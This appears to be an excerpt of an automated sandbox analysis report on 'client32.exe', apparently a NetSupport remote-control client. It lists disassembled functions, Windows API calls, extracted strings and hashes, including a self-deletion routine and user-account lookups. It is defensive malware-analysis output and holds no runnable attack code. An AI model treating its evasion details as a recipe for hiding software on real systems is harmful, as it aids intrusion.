                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 1112758D
                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 1112759E
                                                                                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111275A7
                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 111275AA
                                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,explorer.exe,00000000,00000000,00000000,00000044,00000000,00000000,00000044,?,?,?,?,?,00000000,00000000), ref: 111275E0
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,?,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 11127682
                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127685
                                                                                                                                                                                • DuplicateHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000), ref: 11127688
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,00000000,00000000), ref: 1112769C
                                                                                                                                                                                • _strrchr.LIBCMT ref: 111276AB
                                                                                                                                                                                • _memmove.LIBCMT ref: 11127724
                                                                                                                                                                                • GetThreadContext.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 11127744
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileHandleProcess$CloseCreate$Current$ModuleName_strrchr$ContextDuplicatePathTempThreadVersionWrite_memmovewsprintf
                                                                                                                                                                                • String ID: "%s" %d %s$*.*$D$NSelfDel.exe$explorer.exe$iCodeSize <= sizeof(local.opCodes)$pSlash$selfdelete.cpp
                                                                                                                                                                                • API String ID: 4183152407-800295887
                                                                                                                                                                                • Opcode ID: 0315d106a0fc9dbf4e07deba83296882f6080ca2f1262901bcce6de6934f689e
                                                                                                                                                                                • Instruction ID: 6f5bf149a73cded94bd2a3d0400a9449b47971ff92e0dc1769d6f3c3ef99b26f
                                                                                                                                                                                • Opcode Fuzzy Hash: 0315d106a0fc9dbf4e07deba83296882f6080ca2f1262901bcce6de6934f689e
                                                                                                                                                                                • Instruction Fuzzy Hash: D8B1D4B5A40328AFE724DF60CD85FDAF7B8EB44708F008199E619A76C4DB706A84CF55
                                                                                                                                                                                Function 11147160 Relevance: 31.7, APIs: 8, Strings: 10, Instructions: 220libraryloaderCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • LoadLibraryA.KERNEL32(netapi32.dll,?,?), ref: 11147195
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NetWkstaUserGetInfo), ref: 111471C6
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NetUserGetInfo), ref: 111471D4
                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,NetApiBufferFree), ref: 111471E2
                                                                                                                                                                                • GetUserNameW.ADVAPI32(?,?), ref: 11147233
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 111472A0
                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 111472C3
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AddressProc$CountTick$LibraryLoadNameUser
                                                                                                                                                                                • String ID: <not Available>$AccessDenied$InvalidComputer$NetApiBufferFree$NetUserGetInfo$NetUserGetInfo(%ls\%ls) took %d ms and ret x%x$NetWkstaUserGetInfo$UserNotFound$d$netapi32.dll
                                                                                                                                                                                • API String ID: 132346978-2450594007
                                                                                                                                                                                • Opcode ID: 3b9adc5ce4ed01d7c583f11df73f1d46d2a4f52be5ed7440753a9b842265f317
                                                                                                                                                                                • Instruction ID: 7595ca438a49fe2cfed1e9b9138c1f844f941fc746b3e2b3d1353ee5cc6e5023
                                                                                                                                                                                • Opcode Fuzzy Hash: 3b9adc5ce4ed01d7c583f11df73f1d46d2a4f52be5ed7440753a9b842265f317
                                                                                                                                                                                • Instruction Fuzzy Hash: 3F917A75A012289FDB28CF64C894ADAFBB4EF49318F5581E9E94D97301DB309E80CF91
                                                                                                                                                                                Function 1110F910 Relevance: 30.0, APIs: 12, Strings: 5, Instructions: 241filetimeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 1110F3F0: EnterCriticalSection.KERNEL32(?,2520CF5D,?,?,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001), ref: 1110F427
                                                                                                                                                                                  • Part of subcall function 1110F3F0: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 1110F4FA
                                                                                                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                                                                                                • GetLocalTime.KERNEL32(?,?,PrefixName,00000000,00000000), ref: 1110F98D
                                                                                                                                                                                • wsprintfA.USER32 ref: 1110F9D6
                                                                                                                                                                                • FindFirstFileA.KERNEL32(?,?,?,PrefixName,00000000,00000000), ref: 1110FA07
                                                                                                                                                                                • FindNextFileA.KERNEL32(00000000,?), ref: 1110FA31
                                                                                                                                                                                • FindClose.KERNEL32(00000000), ref: 1110FA3C
                                                                                                                                                                                • wsprintfA.USER32 ref: 1110FA50
                                                                                                                                                                                • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 1110FA78
                                                                                                                                                                                • CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,08000000,00000000), ref: 1110FA97
                                                                                                                                                                                • timeBeginPeriod.WINMM(00000001), ref: 1110FAC1
                                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 1110FAE6
                                                                                                                                                                                • timeGetTime.WINMM ref: 1110FAEC
                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000030,?,00000000), ref: 1110FB1C
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$FindTime$Localtimewsprintf$BeginCloseCreateCriticalEnterEnvironmentExpandFirstNextPeriodPointerSectionStringsWrite__wcstoi64
                                                                                                                                                                                • String ID: %08d.rpf$%s_%02d%02d%02d_%02d%02d_%02d.rpf$*.rpf$PrefixName$Start Record %s
                                                                                                                                                                                • API String ID: 3072557685-3549260256
                                                                                                                                                                                • Opcode ID: 06933f38083a070a63414bdf0f3251dcf1794d1318ec1d890a633dd4c5ceaedf
                                                                                                                                                                                • Instruction ID: 15e7f801646a5cfdcc863d4210531faf8817948f1237b3a41103d8355dc3e960
                                                                                                                                                                                • Opcode Fuzzy Hash: 06933f38083a070a63414bdf0f3251dcf1794d1318ec1d890a633dd4c5ceaedf
                                                                                                                                                                                • Instruction Fuzzy Hash: E191D275A40705ABD724CF74CD86FEBF3B8EB88704F004929F56A972C0EA746940CB51
                                                                                                                                                                                Function 1108B2A0 Relevance: 23.8, Strings: 18, Instructions: 1256COMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                Strings
                                                                                                                                                                                • ispalMid1(%02x,%02x,%02x)=%d, xrefs: 1108BBC0
                                                                                                                                                                                • pal[%d]=%02x,%02x,%02x (%d pixels, palentries=%d), xrefs: 1108BFA0
                                                                                                                                                                                • ispalMid2(%02x,%02x,%02x)=%d, xrefs: 1108BC1C
                                                                                                                                                                                • (pe[%d]=%02x,%02x,%02x), xrefs: 1108C13A
                                                                                                                                                                                • node3 %02x,%02x,%02x (avg %02x,%02x,%02x) pix=%d, candpix=%d, ispal4=%d [%d], xrefs: 1108BD41
                                                                                                                                                                                • node4->parent->parent == node2, xrefs: 1108BF4A
                                                                                                                                                                                • DynamicPalette.cpp, xrefs: 1108BF45
                                                                                                                                                                                • pal[%d]=%02x,%02x,%02x (%d pixels, %d neighbours, level %d), xrefs: 1108B93A
                                                                                                                                                                                • Found black %02x,%02x,%02x, npix=%d, xrefs: 1108B536
                                                                                                                                                                                • ispalAvg(%02x,%02x,%02x)=%d, xrefs: 1108BA77
                                                                                                                                                                                • isMid2(%02x,%02x,%02x)=%d, xrefs: 1108BB58
                                                                                                                                                                                • Found white %02x,%02x,%02x, npix=%d, xrefs: 1108B597
                                                                                                                                                                                • Error node4lvl=%d, node4pix=%d, node2pix=%d, xrefs: 1108B8FE
                                                                                                                                                                                • isMid1(%02x,%02x,%02x)=%d, xrefs: 1108BAE7
                                                                                                                                                                                • pal[%d]=%02x,%02x,%02x, xrefs: 1108C0C5
                                                                                                                                                                                • pop3 [%d]=%02x,%02x,%02x (%d candidates, %d pixels (palpix=%d, rempix=%d)), xrefs: 1108B651
                                                                                                                                                                                • best3remAvg %02x,%02x,%02x=%d, xrefs: 1108BE0A
                                                                                                                                                                                • node4 %02x,%02x,%02x pix=%d, xrefs: 1108BEAC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (pe[%d]=%02x,%02x,%02x)$DynamicPalette.cpp$Error node4lvl=%d, node4pix=%d, node2pix=%d$Found black %02x,%02x,%02x, npix=%d$Found white %02x,%02x,%02x, npix=%d$best3remAvg %02x,%02x,%02x=%d$isMid1(%02x,%02x,%02x)=%d$isMid2(%02x,%02x,%02x)=%d$ispalAvg(%02x,%02x,%02x)=%d$ispalMid1(%02x,%02x,%02x)=%d$ispalMid2(%02x,%02x,%02x)=%d$node3 %02x,%02x,%02x (avg %02x,%02x,%02x) pix=%d, candpix=%d, ispal4=%d [%d]$node4 %02x,%02x,%02x pix=%d$node4->parent->parent == node2$pal[%d]=%02x,%02x,%02x$pal[%d]=%02x,%02x,%02x (%d pixels, %d neighbours, level %d)$pal[%d]=%02x,%02x,%02x (%d pixels, palentries=%d)$pop3 [%d]=%02x,%02x,%02x (%d candidates, %d pixels (palpix=%d, rempix=%d))
                                                                                                                                                                                • API String ID: 0-270670067
                                                                                                                                                                                • Opcode ID: 373a7038849c09b29a40463f49233719df42ea4d45f0b2244540136bd5f3240f
                                                                                                                                                                                • Instruction ID: dccfbb3792dbd9dd87cbc58dc953d259d29f3bd448dc80fbc8ac591c2e088c2b
                                                                                                                                                                                • Opcode Fuzzy Hash: 373a7038849c09b29a40463f49233719df42ea4d45f0b2244540136bd5f3240f
                                                                                                                                                                                • Instruction Fuzzy Hash: 92B2C171E046599FDB14CF99C880AAEBBF1FF88314F1981A9E859AB341D734E941CF90
                                                                                                                                                                                Function 110F91B0 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 173librarywindowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,?,?), ref: 110F91F4
                                                                                                                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?), ref: 110F9236
                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 110F9251
                                                                                                                                                                                • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?), ref: 110F928D
                                                                                                                                                                                • GetLastError.KERNEL32(?,?), ref: 110F9298
                                                                                                                                                                                • FormatMessageA.KERNEL32(00000900,00000000,00000000,00000000,?,00000000,?,00000000,?,?), ref: 110F92DD
                                                                                                                                                                                • LocalFree.KERNEL32(?,?,?), ref: 110F935C
                                                                                                                                                                                • _memmove.LIBCMT ref: 110F938D
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: LibraryLoad$DirectoryErrorFileFormatFreeLastLocalMessageModuleNameSystem_memmove_strrchr
                                                                                                                                                                                • String ID: %s (%d)$??? $Cannot find message %d$Cannot open file %s, error %d$\PCImsg.dll
                                                                                                                                                                                • API String ID: 3675426511-2756047042
                                                                                                                                                                                • Opcode ID: c2f502338490c91e45bc52fd7bf3d2a31634d449f539aef8a9789a3e4086829c
                                                                                                                                                                                • Instruction ID: a5adb6429d0f4308c7ba1c44c8f38ddceac4eb13497d884c9bafb5a88e2dc971
                                                                                                                                                                                • Opcode Fuzzy Hash: c2f502338490c91e45bc52fd7bf3d2a31634d449f539aef8a9789a3e4086829c
                                                                                                                                                                                • Instruction Fuzzy Hash: 9A51E775E0421A9FD714CF64DC85FDAF7B8EB49308F0081A9E959D7281EBB1A944CB90
                                                                                                                                                                                Function 111236E0 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 329windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • IsIconic.USER32(?), ref: 11123836
                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,1118B7D8,000000FF,?,1105C9F8), ref: 1112387B
                                                                                                                                                                                • IsIconic.USER32(?), ref: 111238C4
                                                                                                                                                                                  • Part of subcall function 1111E750: GetClientRect.USER32(?,?), ref: 1111E7BF
                                                                                                                                                                                  • Part of subcall function 1111E750: GetWindowRect.USER32(?,?), ref: 1111E7D4
                                                                                                                                                                                  • Part of subcall function 1111E750: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 1111E7E6
                                                                                                                                                                                  • Part of subcall function 1111E750: MoveWindow.USER32(?,?,?,?,?,00000001), ref: 1111E842
                                                                                                                                                                                  • Part of subcall function 1111E750: MoveWindow.USER32(?,00000000,00000000,?,?,00000001), ref: 1111E85C
                                                                                                                                                                                  • Part of subcall function 1111E750: GetClientRect.USER32(?,?), ref: 1111E867
                                                                                                                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 11123931
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: RectWindow$ClientIconicMove$FreeInvalidateLibraryPoints
                                                                                                                                                                                • String ID: KeepAspect$ScaleToFit$View$ignoring WM_TOUCH
                                                                                                                                                                                • API String ID: 1741509949-3401310001
                                                                                                                                                                                • Opcode ID: 1d3a3484150e3f66b2b7086e688bffaff6d3f060200e3af419f45a291eccd0a1
                                                                                                                                                                                • Instruction ID: 49527fdfa53e08aa09f3a132f4721a51d3eab46a8aa9ea1429b3fa51c4cb3807
                                                                                                                                                                                • Opcode Fuzzy Hash: 1d3a3484150e3f66b2b7086e688bffaff6d3f060200e3af419f45a291eccd0a1
                                                                                                                                                                                • Instruction Fuzzy Hash: 30C12771E1870A9FEB15CF64CA81BEAF7A4FB4C714FA0052EE916872C0E775A841CB51
                                                                                                                                                                                Function 110A1460 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 285timeCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
                                                                                                                                                                                  • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                                                                                                                  • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000), ref: 11029A8C
                                                                                                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                                                                                                • GetLocalTime.KERNEL32(?), ref: 110A1778
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000002.3006561141.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                                                                • Associated: 00000004.00000002.3006544217.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006675365.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006715034.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006779357.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                • Associated: 00000004.00000002.3006809835.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                                                                                                Yara matches
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ErrorExitLastLocalMessageProcessTime__strdup_freewsprintfwvsprintf
                                                                                                                                                                                • String ID: %s\$%s\%s$%s_$CLASSID=$IsA()$LESSON=$[JNL] MakeFileName ret %s$\/:*?"<>|$_%04d_%02d_%02d_%02d%02d$_%s$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                                                                                                                • API String ID: 2014016395-1677429133
                                                                                                                                                                                • Opcode ID: 9228247051525f1da065cd23c74ee2038c03bb78c17c60d70880fe60eb5c521a
                                                                                                                                                                                • Instruction ID: aef08c5c19416ca6c78363d8fb1b9fc7de7af93cef0e20b47086b6b370679a0b
                                                                                                                                                                                • Opcode Fuzzy Hash: 9228247051525f1da065cd23c74ee2038c03bb78c17c60d70880fe60eb5c521a
                                                                                                                                                                                • Instruction Fuzzy Hash: 44B1AF79E00229ABDB15DBA4DD41FEDB7F5AF59388F0441D4E80A67280EB307B44CEA5
                                                                                                                                                                                Function 110CB750 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 168windowCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 110CB7D9
                                                                                                                                                                                • IsIconic.USER32(000019E5), ref: 110CB7E9
